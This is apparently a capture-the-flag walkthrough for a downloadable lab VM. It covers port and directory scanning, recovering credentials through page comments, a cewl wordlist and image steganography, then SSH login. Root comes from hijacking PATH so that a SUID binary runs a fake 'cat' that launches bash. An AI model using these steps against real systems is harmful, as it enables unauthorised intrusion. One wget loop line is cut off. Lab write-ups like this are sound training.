Machine can be download here.
nmap -p- -sC -sV --open -oN ports.log 192.168.56.57
gobuster dir -u http://192.168.56.57 -t 50 -x .php,.html,.txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 400,403,404,500 --wildcard -o 80.log
curl http://192.168.56.57/robots.txt
Open contract1~4.html, check source code, find nothing.
Open sector1.html, check source code, find something.
Download all sector*.html, and grep "secret*".
for i in $(seq 1 10) do wget " done grep "secret" ./*.html
Connect each string, get "puppetmaster", maybe a user name.
Also, sector9.html is different from others, and said something about secret place. Make a dictionary out of it, remember "--with-numbers".
cewl --with-numbers http://192.168.56.57/sector9.html > dic.txt
Scan files with this dic again.
gobuster dir -u http://192.168.56.57 -t 50 -x .php,.html,.txt -w dic.txt -b 400,403,404,500 --wildcard
Open project2501.html, find a new big image file.
Find the source of the image, and download it.
Decryp this image at "https://stylesuxx.github.io/steganography/".
Decrypt the binary string using CyberChef.
Log in as "puppetmaster" using this string as password through ssh.
In home folder, find "systeminfo" with SUID set.
Directly run it, will show some information as user root.
Decompile it, and find only "cat" is using relative path, the other command are all using absolute path.
In home folder, create a fake "cat", and change the $PATH.
echo "bash" > cat chmod +x cat export PATH=/home/puppetmaster:$PATH
We can get root.
